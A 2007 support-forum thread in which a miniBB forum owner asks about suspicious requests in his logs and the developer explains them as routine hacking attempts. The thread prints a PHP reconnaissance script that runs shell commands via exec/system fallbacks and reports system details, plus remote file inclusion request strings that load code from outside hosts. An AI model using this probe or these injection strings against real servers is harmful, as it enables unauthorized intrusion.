miniBB ® 

miniBB

®
Support Forums
  
 | Start | Register | Search | Statistics | File Bank | Manual |
The Other miniBB Support Forums / The Other /  
 

Suspicious HTTP requests from the log files

 
Author kolia
Partaker
#1 | Posted: 27 Sep 2007 05:58 
Hi guys! I am using minibb for a year now, recently started to notice some weird traffic from xxx content sites. I checked the referrers of the link, and there was one strange bit of php, that i am not strong to understand, maybe somebody knows what can it be?


$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){

$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);

}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);

$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;

}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;

Author Paul
Lead Developer 
#2 | Posted: 27 Sep 2007 11:38 
Hmm, I nearly understand what this code is about, but I don't understand where you've got it from. XXX Traffic? This data can not be executed in referrers I suppose...

Author kolia
Partaker
#3 | Posted: 28 Sep 2007 03:05 
Hi Paul, thank you for the reply, in my traffic stats i get this:

Host: 80.172.224.21
/forum/eng.php?img=http://usuarios.arnet.com.ar/larry123/safe.txt?
Http Code: 404 Date: Sep 28 04:34:49 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.808

if you remove the ? mark at the end of safe.txt you will get what i posted before.
I don't want to know exactly what it does, i just want to know if I should worry about something or not? is my forum under attack or it was hacked:)

Spasibo anyway, i know it's probably not your business, just thought it would be interesting.

Author kolia
Partaker
#4 | Posted: 28 Sep 2007 03:19 
ah ok i found some info about it http://www.ossec.net/wiki/index.php/WebAttacks_links#Sites_with_PHP.2FPerl_scripts

Author Paul
Lead Developer 
#5 | Posted: 28 Sep 2007 04:41 
Well, I could say only miniBB traffic is full of such stuff and even more :-)

For example from our logs (minibbtest):

/http://indir.savsak.com/shell.txt

minibb-test.php+[plm=0]+get+http://
minibb.org/minibb-test.php+[0,33753,33538]+->+[n]+post+http://minibb.org/minibb-test.php

/testhttp://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt

The hackers will send such requests always, and there is nothing dangerous until you have safe up-to-date version of PHP, probably mySQL and the latest release of miniBB of course.

The code you are reffering in that case will try to execute on the malicious server and provide some info about this server to the hacker, like disk space available and system information. I suppose this code does nothing dangerous and just checks. It works probably only if there's some hole in PHP root code which has been discovered in the past.

You could check your system for the basic security executing _install.php file which comes by default in miniBB package, with the 'analysis' parameter, i.e.

_install.php?analysis

It should give information regarding PHP version, register_globals, safe_mode and vulnerable folder. These are the basic things to know to be protected.

I think having just what you see in your logs is not reason of worrying. But if you see some strange unknown files under your forums folder which do not come by default with miniBB, it is worth to investigate where they come from.

Author kolia
Partaker
#6 | Posted: 28 Sep 2007 04:52 
Thank you very much Paul!
Spasibo Bolshoye:)

The Other miniBB Support Forums / The Other /
 Suspicious HTTP requests from the log files
 Share Topic's Link

Your Reply Click this icon to move up to the quoted message


  ?
Post as a Guest, leaving the Password field blank. You could also enter a Guest name, if it's not taken by a member yet. Sign-in and post at once, or just sign-in, bypassing the message's text.


Before posting, make sure your message is compliant with forum rules; otherwise it could be locked or removed with no explanation.

 

 
miniBB Support Forums Powered by Forum Software miniBB ® Home  Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contact Us
Get the Captcha add-on: protect your miniBB-forums from the automated spam and flood.


  ⇑